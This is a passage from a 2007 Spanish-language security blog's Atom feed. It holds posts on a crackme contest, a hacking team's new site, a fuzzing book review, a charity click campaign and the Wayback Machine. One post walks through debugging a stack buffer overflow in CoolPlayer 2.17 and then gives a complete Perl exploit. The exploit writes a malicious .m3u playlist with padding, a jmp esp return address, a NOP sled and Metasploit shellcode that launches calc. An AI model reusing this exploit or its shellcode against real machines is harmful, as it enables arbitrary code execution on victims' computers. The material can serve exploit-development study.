comprarme pero vi el concurso y lo intenté pero al final nada jeje, así que a esperar que vuelvan a ofrecerlo o a comprarlo porque la verdad es bastante bueno por lo que lei en internet.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.s21sec.com/descargas/Reto_2.zip"&gt;&lt;span style="font-weight:bold;"&gt;Crackme&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El crackme tenía dos protecciones.&lt;br /&gt;&lt;br /&gt;1.- Había que teclear al iniciarse el crackme "S21secLabs - Reto 2"&lt;br /&gt;2.- Tenía una comparación simple.&lt;br /&gt;&lt;br /&gt;Asi que el texto claramente podria ser cualquiera que cumpliera esas dos condiciones, y ya que pedían una poesía pues se la dimos, dentro del crackme había una que fue la que aproveche para ponerlo completa, pero no era necesario, ya que como dijimos cualquier texto que cumpla esas 2 cosas vale.&lt;br /&gt;&lt;br /&gt;Fueron 5 los que pasaron con sus respectivas soluciones:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;- &lt;a href="http://www.s21sec.com/descargas/dapaf.zip"&gt;dapaf&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.s21sec.com/descargas/Gadix.zip"&gt;Gadix&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.s21sec.com/descargas/solid.zip"&gt;solid&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.s21sec.com/descargas/Tora.zip"&gt;Tora&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.s21sec.com/descargas/Trancek.zip"&gt;Trancek&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Los ganadores fueron elegidos por tiempo, correción de la solución y explicación.A mí la verdad me pareció algo raro el tema de como hicieron la puntuación final.&lt;br /&gt;&lt;br /&gt;Tiempo de envío (1-5), Solución correcta (1-10), Explicación (1-5), Total: &lt;br /&gt;&lt;br /&gt;dapaf: 5 , 10 , 3 ;18&lt;br /&gt;Gadix: 2 , 8 , 4 ; 14&lt;br /&gt;solid: 5 , 8 , 5 ;18&lt;br /&gt;Tora: 3 , 8 , 4 ; 15&lt;br /&gt;Trancek: 3 , 8 , 4 ; 15&lt;br /&gt;&lt;br /&gt;Y así quedó todo, como 3º o 4º sin optar al libro pero bueno, espero que la próxima se me de mejor y sea un premio de estas caracteríticas jeje.&lt;br /&gt;&lt;br /&gt;Al menos se pierde con 2 maestros de crackslatinos como son solid y dapaf, suerte a los 2 y espero algún día alcanzaros!!! Y a los demás espero verles en el próximo, que  a ellos no les conozco, y Gadix no se si será el mismo que el que se encargaba de los juegos en la época de la web de Karpoff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3835334560015314750?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3835334560015314750/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3835334560015314750' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3835334560015314750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3835334560015314750'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/2-reto-s21sec-labs.html' title='2º Reto S21sec Labs'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-7092264264453031974</id><published>2007-11-03T21:17:00.000+01:00</published><updated>2007-11-03T21:35:16.807+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='P1mp4m'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditoria'/><title type='text'>P1mp4m T34M</title><content type='html'>Bueno hace nada nos mudamos del &lt;a href="http://pimpamteam.blogspot.com/"&gt;Blog de P1mp4m&lt;/a&gt; a la web oficial y foro de momento &lt;a href="http://www.p1mp4m.es"&gt;P1mp4m.es&lt;/a&gt; en el cual se va a dar ayuda a todos los usuarios que lo necesiten, además de integrar algunos cambios que principalmente no tienen todas las web de este tipo como son: &lt;span style="font-weight:bold;"&gt;Un laboratorio&lt;/span&gt; (la idea que más me gusta), en el cual al principio se cogerá software que tienen vulnerabilidades para estudiarlo y de ese modo aprender, además de poder encontrar otras posibles vulnerabilidades en el mismo software que no estén publicadas, el tipo de aplicaciones principalmente serán las basadas en Web, y muy probable que PHP las que más, pero a lo largo del tiempo si todo va bien, se podría incluir bajo ASP.Net y aplicaciones software (tema bastante interesante). &lt;br /&gt;&lt;br /&gt;También se va a incluir una &lt;span style="font-weight:bold;"&gt;biblioteca&lt;/span&gt; con todo tipo de manuales, y &lt;span style="font-weight:bold;"&gt;artículos&lt;/span&gt; escritos por el team o por gente de la comunidad, abarcando temas actuales sobretodo.&lt;br /&gt;&lt;br /&gt;Todo esto se está planeando y está quedando montado de tal forma que cuando empiecen a llegar usuarios ya esté finalizada la web.&lt;br /&gt;&lt;br /&gt;Así que espero que os guste y disfruten con el contenido y aprendiendo!! Sobretodo hay que ser autodidacta muchas veces pero con ayuda de alguien que siempre viene bien.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.p1mp4m.es"&gt;P1mp4m&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-7092264264453031974?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/7092264264453031974/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=7092264264453031974' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7092264264453031974'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7092264264453031974'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/p1mp4m-t34m.html' title='P1mp4m T34M'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6100554090376380261</id><published>2007-10-28T17:11:00.001+01:00</published><updated>2007-10-28T23:58:16.334+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><title type='text'>Fuzzing: Brute Force Vulnerability Discovery (Paperback)</title><content type='html'>Hoy voy a escribir sobre un libro que me quiero comprar que la verdad me parece muy interesante sus contenidos y que claramente es muy profesional solo hay que ver a los autores que lo han escrito y donde trabajan. Bueno ahi va la descripción que aparece en amazon.com, traducida por mí más o menos bien. En el link de la fuente viene info además sobre los autores.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Autores:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://portal.spidynamics.com/blogs/msutton/default.aspx"&gt;Michael Sutton&lt;/a&gt;&lt;br /&gt;&lt;a href="http://labs.idefense.com/software/fuzzing.php#more_spikefile"&gt;Adam Greene&lt;/a&gt;&lt;a href="http://labs.idefense.com/software/fuzzing.php#more_spikefile"&gt; &lt;/a&gt;&lt;br /&gt;&lt;a href="http://pedram.redhive.com/blog/"&gt;Pedram Amini&lt;/a&gt;&lt;a href="http://pedram.redhive.com/blog/"&gt; &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Fuzzing&lt;/span&gt;&lt;br /&gt;Actualmente es una de las más poderosas técnicas para revelar fallos de seguridad. El fuzzing es una de las formas más efectivas de ver la seguridad del software. Para fuzzear, tu atacas a la entrada de datos de un cógido aleatorio del programa, y después sistemáticamente identificas los fallos que surjan. Los hackers llevan confiando en el fuzzing durante años: Ahora, es tú turno. En este libro, reconocidos expertos en fuzzing te muestran cómo usar el fuzzing para descubrir debilidades en tu software antes de que alguien lo haga.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Fuzzing&lt;/span&gt; es el primer y único libro que cubre el fuzzing desde el principio hasta el final, dándote una disciplina mejor para practicar una técnica que ha sido implementada de una manera informal tradicionalmente. Los autores empiezan por revisar como trabaja el fuzzing y como leer entre líneas da ventajas cruciales sobre otras formas de ver la seguridad. Después, ellos introducen lo más reciente en técnicas en el arte del fuzzing para encontrar vulnerabilidades en protocolos de redes, formatos de archivos, y aplicaciones web; demuestran el uso automatizado de las herramientas de fuzzing; y presentan varios casos profundizando como trabaja el fuzzing.&lt;br /&gt;&lt;br /&gt;El libro incluye:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Porqué el fuzzing simplifica el testeo del diseño y obtiene otros métodos perdidos de encontrar fallos.&lt;/li&gt;&lt;li&gt;El proceso del fuzzing: desde identificar entradas de datos a evaluar si es explotable.&lt;/li&gt;&lt;li&gt;Entendiendo los requerimientos necesarios para un fuzzing efectivo.&lt;/li&gt;&lt;li&gt;Comparaciones entre fuzzers basados en mutación y en generación.&lt;/li&gt;&lt;li&gt;Usando y automatizando el fuzzing de variables de entorno y argumentos.&lt;/li&gt;&lt;li&gt;Dominando las técnicas de fuzzing en memoria.&lt;/li&gt;&lt;li&gt;Construyendo frameworks y herramientas de fuzzing personalizadas.&lt;/li&gt;&lt;li&gt;Implementando sistemas inteligentes de deteccion de errores.&lt;/li&gt;&lt;/ul&gt;Los atacantes normalmente usan fuzzing. Tú deberías también. Si tu eres un programador, ingeniero de seguridad, tester o un especialista QA, este libro te enseñara como construir software seguro.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Índice del libro:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Foreword&lt;br /&gt;Preface&lt;br /&gt;Acknowledgments&lt;br /&gt;About the author&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Part I: Background&lt;/span&gt;&lt;br /&gt;Chapter 1: Vulnerability Discovery Methodologies&lt;br /&gt;Chapter 2: What Is Fuzzing?&lt;br /&gt;Chapter 3: Fuzzing Methods and Fuzzer Types&lt;br /&gt;Chapter 4: Data Representation and Analysis&lt;br /&gt;Chapter 5: Requirements for Effective Fuzzing&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Part II: Targets and Automation&lt;/span&gt;&lt;br /&gt;Chapter 6: Automation and Data Generation&lt;br /&gt;Chapter 7: Enviroment Variable and Argument Fuzzing&lt;br /&gt;Chapter 8: Enviroment Variable and Argument Fuzzing: Automation&lt;br /&gt;Chapter 9: Web Application and Server Fuzzing&lt;br /&gt;Chapter 10: Web Application and Server Fuzzing: Automation&lt;br /&gt;Chapter 11: File Format Fuzzing&lt;br /&gt;Chapter 12: File Format Fuzzing: Automation on UNIX&lt;br /&gt;Chapter 13: File Format Fuzzing: Automation on Windows&lt;br /&gt;Chapter 14: Network Protocol Fuzzing&lt;br /&gt;Chapter 15: Network Protocol Fuzzing: Automation on UNIX&lt;br /&gt;Chapter 16: Network Protocol Fuzzing: Automation on Windows&lt;br /&gt;Chapter 17: Web Browser Fuzzing&lt;br /&gt;Chapter 18: Web Browser Fuzzing: Automation&lt;br /&gt;Chapter 19: In-Memory Fuzzing&lt;br /&gt;Chapter 20:In-Memory Fuzzing: Automation&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Part III: Advanced Fuzzing Technologies&lt;/span&gt;&lt;br /&gt;Chapter 21: Fuzzing Frameworks&lt;br /&gt;Chapter 22: Automated Protocol Dissection&lt;br /&gt;Chapter 23: Fuzzer Tracking&lt;br /&gt;Chapter 24: Intelligent Fault Detection&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Part IV: Looking Forward&lt;/span&gt;&lt;br /&gt;Chapter 25: Lessons Learned&lt;br /&gt;Chapter 26: Looking Forward&lt;br /&gt;&lt;br /&gt;Index&lt;br /&gt;&lt;br /&gt;Fuente:&lt;a href="http://www.amazon.com/gp/product/0321446119/ref=pd_cp_b_2/103-0470051-9879837?pf_rd_m=ATVPDKIKX0DER&amp;amp;pf_rd_s=center-41&amp;amp;pf_rd_r=1H0V54NYVV96EDQK73M7&amp;amp;pf_rd_t=201&amp;amp;pf_rd_p=317711001&amp;amp;pf_rd_i=0132271915"&gt;Amazon.com - Fuzzing&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6100554090376380261?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6100554090376380261/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6100554090376380261' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6100554090376380261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6100554090376380261'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/fuzzing-brute-force-vulnerability.html' title='Fuzzing: Brute Force Vulnerability Discovery (Paperback)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5788617947481777172</id><published>2007-10-26T15:48:00.000+02:00</published><updated>2007-10-26T16:08:53.395+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><title type='text'>Un clic por el bosque</title><content type='html'>Hace tiempo que entraba en una web, que donaba dinero a una ONG (Aquaverde) cuando se consiguieran 100 Millones de clicks, y eso después de varios meses creo, se ha conseguido, hace pocos meses llevaban una sola décima parte de ello, pero en tan poco tiempo se ha hecho posible y 10.000 euros que van para la ONG, para salvar el bosque del Amazonas y reforestarlo. Ha sido posible a la constante gente que ha entrado a esta web: http://un-clic-por-el-bosque.com/ y a los clicks diarios de cada persona permitidos por IP, espero que para cosas así se utilicen también las botnets jejej, y que haya mas iniciativas de donar dinero de este tipo, ya que mucha gente puede participar con un solo click!!!&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_L9yjBo3h8BM/RyH0QSvDJAI/AAAAAAAAAA8/MPj1-Q7m3iA/s1600-h/unclick.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_L9yjBo3h8BM/RyH0QSvDJAI/AAAAAAAAAA8/MPj1-Q7m3iA/s400/unclick.JPG" alt="" id="BLOGGER_PHOTO_ID_5125646411668595714" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Asociación: http://www.aquaverde.org/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5788617947481777172?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5788617947481777172/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5788617947481777172' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5788617947481777172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5788617947481777172'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/un-clic-por-el-bosque.html' title='Un clic por el bosque'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_L9yjBo3h8BM/RyH0QSvDJAI/AAAAAAAAAA8/MPj1-Q7m3iA/s72-c/unclick.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-19117317858569297</id><published>2007-10-24T23:02:00.002+02:00</published><updated>2010-01-15T22:35:10.330+01:00</updated><title type='text'>CoolPlayer 2.17 Stack Overflow</title><content type='html'>Hago aqui una puqueña introduccion de lo que se hara en el taller de buffer overflow, empezando con los stack, aqui tenemos un software que es explotable. Cuando me puse a buscar fallos en software me encontre con el TotalPlayer 3.0 (una copia de coolplayer con malware) y me entere gracias a una persona en securityfocus, y el totalplayer mostraba seguridad por lo que me puse con el original, el coolplayer 2.17.&lt;br /&gt;El fallo en sí, se encontraba al abrir archivos .m3u con demasiados bytes en su interior (IMG:style_emoticons/default/tongue.gif)&lt;br /&gt;&lt;br /&gt;Comencemos:&lt;br /&gt;&lt;br /&gt;Despues de ver eso, es hora de irnos a investigar, abrimos el OllySnd por ejemplo:&lt;br /&gt;&lt;br /&gt;Yo lo hice de este modo para ver el lugar exacto donde se producia, mire en strings y vi por ahi cosas como playlist y demas, asi que me fui a&lt;br /&gt;&lt;br /&gt;0040CAA3 |. 68 C4DA4400 |push coolplay.0044DAC4 ; ASCII "playlist"&lt;br /&gt;&lt;br /&gt;y bajando un poco nos encontramos con una funcion muy sospechosa:&lt;br /&gt;&lt;br /&gt;0040CBA8 |. FF15 08514300 call ds:[&lt;&amp;amp;KERNEL32.ReadFile&gt;] ; \ReadFile&lt;br /&gt;&lt;br /&gt;Ponemos un BP y al abrir el archivo se para ahi, seguimos traceando un poco con f8 y cuando caemos aqui:&lt;br /&gt;&lt;br /&gt;0040CC07 |. E8 D4FCFFFF |call coolplay.0040C8E0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El archivo da el problema, asi que lo reiniciamos y lo miramos con f7&lt;br /&gt;&lt;br /&gt;de nuevo viendo poco a poco vemos que hay 2 funciones iguales, y como la que tiene que ver con el error es la segunda le ponemos un bp ahi(esto lo he visto traceando poco a poco), es facil, si no sale no preocuparse jeje:&lt;br /&gt;&lt;br /&gt;0040C98A |. FF15 20514300 call ds:[&lt;&amp;amp;KERNEL32.lstrcpyA&gt;] ; \lstrcpyA&lt;br /&gt;&lt;br /&gt;En ese momento creo que la pila estaba asi:&lt;br /&gt;&lt;br /&gt;0013271C 7C809BA8 kernel32.7C809BA8&lt;br /&gt;00132720 FFFFFFFF&lt;br /&gt;00132724 0040CC0C RETURN to coolplay.0040CC0C from coolplay.0040C8E0 -- importante&lt;br /&gt;00132728 003D41D0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y seguimos bajando y caemos en:&lt;br /&gt;&lt;br /&gt;0040C9B0 |. 81C4 04010000 add esp,104 -- la pila esta antes de llegar al ret address&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;00132620 505C3A46 -esp&lt;br /&gt;00132624 5C6C7265 --ret address&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Al tracear una vez mas, el ret adress sta sobreescrito, y esp apunta a la linea de abajo del ret address, por lo que sera mas facil hacer el exploit funcional:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;00132620 41414141&lt;br /&gt;00132624 41414141 - ret address sobreescrita(aqui un salto a esp(jmp esp))&lt;br /&gt;00132628 41414141 -esp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asi que teniendo esto despues de tracearlo con el olly, vamos a crear el exploit:&lt;br /&gt;&lt;br /&gt;Para ello utilizare perl, y una shellcode de metasploit (IMG:style_emoticons/default/tongue.gif)&lt;br /&gt;&lt;br /&gt;Esto iba a ir a milw0rm, pero de momento no,porque parece ser que no funciona del todo bien en alguna que otra maquina xD&lt;br /&gt;&lt;br /&gt;Exploit modificado:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;################################################################################&lt;br /&gt;#####################################&lt;br /&gt;#&lt;br /&gt;#CoolPlayer, Latest Build: 217&lt;br /&gt;#Web:: http://coolplayer.sourceforge.net/&lt;br /&gt;#Playlist(.m3u) File Local Buffer Overflow Exploit&lt;br /&gt;#&lt;br /&gt;#Vuln:http://www.securityfocus.com/bid/21396&lt;br /&gt;#&lt;br /&gt;#Instrucciones:coolplayerm3u.pl debe de estar en el mismo directorio que el perl.exe&lt;br /&gt;#&lt;br /&gt;#Agradecimientos a: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto&lt;br /&gt;# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi jeje&lt;br /&gt;# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD&lt;br /&gt;# Además del equipo de www.p1mp4m.es --&gt;musashi,patoruzu,elvispresley,pepepistola,skyline2412&lt;br /&gt;#&lt;br /&gt;# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y&lt;br /&gt;# el_manguan que estuvo ayudando tambien y probando.&lt;br /&gt;#&lt;br /&gt;#Exploit por: Trancek&lt;br /&gt;#Email:trancek@yashira.org&lt;br /&gt;#&lt;br /&gt;################################################################################&lt;br /&gt;######################################&lt;br /&gt;use Cwd;&lt;br /&gt;&lt;br /&gt;print "CoolPlayer 2.17 .m3u Exploit\n\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$dir = getcwd()."/";&lt;br /&gt;$lon = length($dir);&lt;br /&gt;$nanai = 260 - $lon;&lt;br /&gt;$junk = 'A' x $nanai;&lt;br /&gt;$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com&lt;br /&gt;my $shellcode =&lt;br /&gt;"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x66".&lt;br /&gt;"\x3f\x59\x90\x83\xeb\xfc\xe2\xf4\x9a\xd7\x1d\x90\x66\x3f\xd2\xd5".&lt;br /&gt;"\x5a\xb4\x25\x95\x1e\x3e\xb6\x1b\x29\x27\xd2\xcf\x46\x3e\xb2\xd9".&lt;br /&gt;"\xed\x0b\xd2\x91\x88\x0e\x99\x09\xca\xbb\x99\xe4\x61\xfe\x93\x9d".&lt;br /&gt;"\x67\xfd\xb2\x64\x5d\x6b\x7d\x94\x13\xda\xd2\xcf\x42\x3e\xb2\xf6".&lt;br /&gt;"\xed\x33\x12\x1b\x39\x23\x58\x7b\xed\x23\xd2\x91\x8d\xb6\x05\xb4".&lt;br /&gt;"\x62\xfc\x68\x50\x02\xb4\x19\xa0\xe3\xff\x21\x9c\xed\x7f\x55\x1b".&lt;br /&gt;"\x16\x23\xf4\x1b\x0e\x37\xb2\x99\xed\xbf\xe9\x90\x66\x3f\xd2\xf8".&lt;br /&gt;"\x5a\x60\x68\x66\x06\x69\xd0\x68\xe5\xff\x22\xc0\x0e\xd0\x97\x70".&lt;br /&gt;"\x06\x57\xc1\x6e\xec\x31\x0e\x6f\x81\x5c\x38\xfc\x05\x11\x3c\xe8".&lt;br /&gt;"\x03\x3f\x59\x90";&lt;br /&gt;&lt;br /&gt;$nopeando = "\x90" x 20;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;open(m3u, "&gt;./vuln.m3u");&lt;br /&gt;print m3u "$junk";&lt;br /&gt;print m3u "$ret";&lt;br /&gt;print m3u "$nopeando";&lt;br /&gt;print m3u "$shellcode";&lt;br /&gt;&lt;br /&gt;print "Instrucciones: coolplayerm3u.pl debe de estar en el mismo directorio que el \n";&lt;br /&gt;print "perl.exe o al llamarlo debes de tener el directorio de perl en las variables de entorno \n\n";&lt;br /&gt;&lt;br /&gt;print "Directorio: ",$dir,"\n";&lt;br /&gt;print "Longitud del directorio: ",$lon,"\n";&lt;br /&gt;print "Numero de Junk(A) Total: ",$nanai,"\n\n";&lt;br /&gt;&lt;br /&gt;print "Cuidado: Cambiar el archivo de directorio, provoca que no funcione el exploit\n";&lt;br /&gt;print "Depende del directorio actual del archivo .m3u y da problemas en el directorio\n";&lt;br /&gt;print "raiz C:\, F:\, etc...(Son 3 'A' mas)\n\n";&lt;br /&gt;&lt;br /&gt;print "Archivo creado\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-19117317858569297?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/19117317858569297/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=19117317858569297' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/19117317858569297'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/19117317858569297'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/coolplayer-217-stack-overflow.html' title='CoolPlayer 2.17 Stack Overflow'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4002525135825616002</id><published>2007-10-20T22:09:00.000+02:00</published><updated>2007-11-03T19:21:39.408+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas WEB'/><title type='text'>La máquina del tiempo de Internet</title><content type='html'>¿Alguna vez te has preguntado como sería una web hace tiempo?¿Te has encontrado con que quieres ver como era tu web hace tiempo y no lo guardaste? Este es el momento para ver como era tu web cuando la creaste, poco tiempo después, lo que tarda una web en registrarlo y hacer copias de ella. El servicio en cuestion es: &lt;a href="http://web.archive.org/web/*/http://www.trancek.es/"&gt;Wayback Internet Machine&lt;/a&gt; , la mia todavia no aparece pero es cuestion de tiempo espero. Aquí os dejo una screen por ejemplo de cuando &lt;a href="http://www.yashira.org/"&gt;yashira&lt;/a&gt; era hackyashira.com, del 2º registro que se hizo en "archives":&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_L9yjBo3h8BM/Rx-sQfYFJAI/AAAAAAAAAA0/G1gpQ4uV4EM/s1600-h/yashiratime.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_L9yjBo3h8BM/Rx-sQfYFJAI/AAAAAAAAAA0/G1gpQ4uV4EM/s400/yashiratime.jpg" alt="" id="BLOGGER_PHOTO_ID_5125004300271297538" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Como podemos ver hay un tal rey brujo que tal vez sea el de elhacker.net, el megabyte("dios de la red") jejejeje, el_manguan, gran desaparecido junto a otros que pueden sonar, por lo menos a mi me suenan unos cuantos.&lt;br /&gt;Se ha notado el gran cambio que ha dado yashira hasta el día de hoy, que recuerdos de cuanto entré hace ya...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4002525135825616002?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4002525135825616002/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4002525135825616002' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4002525135825616002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4002525135825616002'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/la-mquina-del-tiempo-de-internet.html' title='La máquina del tiempo de Internet'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_L9yjBo3h8BM/Rx-sQfYFJAI/AAAAAAAAAA0/G1gpQ4uV4EM/s72-c/yashiratime.jpg' height='72' 